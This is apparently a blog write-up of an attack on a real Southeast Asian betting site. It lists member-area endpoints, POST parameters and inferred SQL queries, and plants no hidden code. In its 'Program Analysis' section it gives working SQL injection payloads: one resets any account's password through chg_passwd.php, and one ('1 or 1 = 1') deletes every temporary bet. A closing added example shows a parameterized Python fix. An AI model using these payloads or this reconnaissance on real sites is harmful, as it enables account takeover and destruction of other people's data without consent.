A penetration of a site in Southeast Asia

Source: Internet
Author: User
# After login, the UID is reassigned and the user name and password are also passed.
Presumably a dedicated data table stores this data.
# Possible data table structure:
create table loginuid (
  uid char(16),
  id integer,
  username varchar(30),
  time datetime
);

/APP/member/chk_rule.php?mtype=&uid=1c2c91396a7f1966
# mtype does not seem to be a required parameter and has no effect.
# The program looks up the uid. If it is invalid, it returns to the home page.

/APP/member/ft_header.php?uid=1c2c91396a7f1966&showtype=&mtype=3
# Displays the top menu. The parameters are not required, including uid.

/APP/member/select.php?uid=1c2c91396a7f1966&mtype=3
# The leftmost user information area. The uid must be valid.

Football

/APP/member/ft_index.php?uid=1c2c91396a7f1966&langx=ZH-tw&mtype=3
# After entering, football is displayed by default. mtype does not seem to have any effect.

/APP/member/ft_browse/index.php?uid=1c2c91396a7f1966
# Single-field: Rtype=r

/JS/ft_mem_showgame.js
# This seems to be for betting; it is used to generate a page in the left information bar.
/APP/member/ft_browse/body_var.php
# It is actually HTML that generates arrays, which is useful for later research.
/APP/member/ft_browse/body_browse.php?uid=109dc631978b8b0&Rtype=r
# Displays the information of a single field, but it seems that uid is not required.

# Go to the ground: Same as a single field, only Rtype = Re
# Boldlike: Just like a single game, just Rtype = Pd
# AUTUMN: Rtype = T

# Standard pass (Rtype = P) and pass (Rtype = Pr)

Bet:
/APP/member/ft_order/ft_order_m.php?gid=843&uid=2017dc631978b8b0&type=H&gnum=301
# Creates the betting page
# gid and gnum are defined in the body_var array.

/APP/member/ft_order/ft_order_m.php
# Handling betting Information
# Post:

gold=60&uid=109dc631978b8b0&active=1&line_type=3&gid=843&type=C&gnum=301&concede_h=1&radio_h=100&ioradio_r_h=6.60&gmax_single=30000&gmin_single=50&singlecredit=1000&singleorder=500&restsinglecredit=0&wagerstotal=1000&restcredit=1000&pay_type=0

# SQL: select fl, FID, pos from ft_follow where gid = '$gid'
# SQL: select * from ft_param where ltype = $line_type and gid = $gid and rtype = '$Rtype'
# SQL: insert into wagersou (gtype, wtype, CID, Sid, aid, mid,
    code, code_value, pay_type, winloss_s,
    winloss_a, gold, gold_d, GID, gnum, strong, type, concede, ratio, ioratio, result,
    orderdate, adddate, wingold, wratio_c, wratio_s, wratio_a, wratio_m, wgold_c,
    wgold_s, wgold_a, wgold_m)
  values ('ft', 'M', '7', '26', '123456', 'RMB', '1',
    '0', '000000', '30', '$gold', '5.00', '$gid', '$gnum', '', 'C', '1', '000000',
    '$ioradio_r_h', '0', '2017-03-10', '2017-03-100', '0', '95', '95',
    '95', '000000', '0', '0', '0', '0')

/APP/member/ft_order/ft_order_p.php
# Generate a temporary bet
# Post:

game_id1=844&game1=H&game_id2=846&game2=H&game_id3=847&game3=H&game_id4=848&game_id5=849&game_id6=845&game_id7=850&teamcount=7&active=1&uid=6defa21b702a5d87&team0310=%C8%B7%C8%cf

# SQL: select fl, FID, pos from ft_follow where gid = '$game_id1'
# SQL: select ioratio from ft_param where gid = '000000' and rtype = 'm$game1'

/APP/member/ft_order/ft_order_pr.php?active=3&uid=109dc631978b8b0&tmp_id=76507&pdate=
# Deletes a temporary bet. Note tmp_id.

# SQL: delete from wagers_tmp where id = $tmp_id

/APP/member/ft_order/ft_order_pr_finish.php
# Handle multiple bets
# Post:

wkind=S&wstar=3&gold=50&uid=109dc631978b8b0&active=1&teamcount=3&username=caa1307&singlecredit=1000&singleorder=500&gmin_single=50&gmax_single=500&restcredit=854&wagerstotal=0&pay_type=0&SC=0+0+0+&pdate=2004-03-10

# SQL: select id, gold, code_value from wagersp where mid = login and
    star = $teamcount and rtype = 'pr' and gtype = 'ft'

/APP/member/result.php?game_type=ft&uid=109dc631978b8b0
# Competition results
# Post: game_type=ft&today=2004-03-10&submit=%B2%E9%D1%af
# SQL: select id, name_c, name_g, name_e from $game_type_leagues
# SQL: select * from $game_type where league_id = '000000' and date = '$today'
    and game_over = 'y' order by num_c

Member information:
/APP/member/account/mem_data.php?uid=109dc631978b8b0
# Member information, uid must be valid

/APP/member/account/chg_passwd.php?uid=109dc631978b8b0
# Change password

/APP/member/account/chg_passwd.php?uid=109dc631978b8b0
# Processes the password information when action = 1
# Post: password=ice3y3&action=1&uid=109dc631978b8b0
# SQL: update members set password = PASSWORD('$password'),
    passwd = '$password' where id = '000000'
# Note: members.password is the encrypted password, passwd is the plaintext, and id is calculated based on the uid.

# Structure: update members set password = PASSWORD('$password'),
    passwd = '$password' where id = '000000'

**************************************** ************

Program Analysis:

Login:
# SQL: select id, username, type from members where username = '$username'
    and password = PASSWORD('$password') and 'enabled' = 'y'

Login verifies members.password, which is the encrypted password field, rather than the plaintext password field.
So only members.password needs to be modified to change the password.
The modification goes through /APP/member/account/chg_passwd.php?uid=109dc631978b8b0
# SQL: update members set password = PASSWORD('$password'), passwd = '$password' where id = '000000'
# Because 'is replaced with \' and \ is replaced with \, the password we modified must contain \ characters.
# $password = newpwd ') where id = ID /*
# After system processing, it will eventually become: $password = newpwd \ ') where id = ID /*
# Substituted into the SQL:
# SQL: update members set password = PASSWORD('newpwd \\')
    where id = ID /* '), passwd = 'newpwd \') where id = ID /* ' where id = '000000'
# Equivalent to SQL: update members set password = PASSWORD('newpwd \ ') where id = ID
# The ID can be any number.

Delete temporary bets:
/APP/member/ft_order/ft_order_pr.php?active=3&uid=109dc631978b8b0&tmp_id=76507&pdate=
# Deletes a temporary bet. Note tmp_id.
# SQL: delete from wagers_tmp where id = $tmp_id
# $tmp_id = 1 or 1 = 1 /*
# SQL: delete from wagers_tmp where id = 1 or 1 = 1
# Result: All temporary bets are deleted.
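
The root cause of both findings above is request input pasted into the SQL text; for the unquoted tmp_id, quote escaping does not help at all. The following is an added example, not code from the original article or from the site: it uses Python's sqlite3 as a stand-in for the site's database and shows the concatenated delete next to a bound-parameter form scoped to the session's member. The wagers_tmp columns (mid as the owning member, gold) and the function names are assumptions.

```python
import sqlite3

def make_db():
    """Constructed sample data: three temporary bets owned by two members."""
    db = sqlite3.connect(":memory:")
    # Assumed schema: the article only shows wagers_tmp.id.
    db.execute("create table wagers_tmp (id integer primary key, mid integer, gold integer)")
    db.executemany("insert into wagers_tmp (id, mid, gold) values (?, ?, ?)",
                   [(76507, 1, 50), (76508, 1, 60), (76509, 2, 100)])
    return db

def delete_tmp_concat(db, tmp_id):
    """Pattern described in the article: tmp_id is pasted in, unquoted."""
    cur = db.execute("delete from wagers_tmp where id = " + tmp_id)
    return cur.rowcount

def delete_tmp_bound(db, session_mid, tmp_id):
    """Hardened form: tmp_id must be a decimal integer, is passed as a bound
    parameter, and the delete only matches rows owned by the logged-in member."""
    if not (tmp_id.isascii() and tmp_id.isdigit()):
        raise ValueError("tmp_id must be a decimal integer")
    cur = db.execute("delete from wagers_tmp where id = ? and mid = ?",
                     (int(tmp_id), session_mid))
    return cur.rowcount

def remaining(db):
    """Number of temporary bets left in the table."""
    return db.execute("select count(*) from wagers_tmp").fetchone()[0]

if __name__ == "__main__":
    db = make_db()
    delete_tmp_concat(db, "1 or 1 = 1")          # value from the article
    print("concatenated, rows left:", remaining(db))

    db = make_db()
    print("bound, own bet deleted:", delete_tmp_bound(db, 1, "76507"))
    print("bound, other member's bet deleted:", delete_tmp_bound(db, 1, "76509"))
    try:
        delete_tmp_bound(db, 1, "1 or 1 = 1")
    except ValueError as exc:
        print("bound, rejected:", exc)
    print("bound, rows left:", remaining(db))
```

The same binding applies to the chg_passwd.php update: the password travels as a parameter, and the row to update is chosen from the server-side session rather than from text spliced into the statement.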

//////////////////////////////////////// ///// All rights reserved for iceeye, please refer
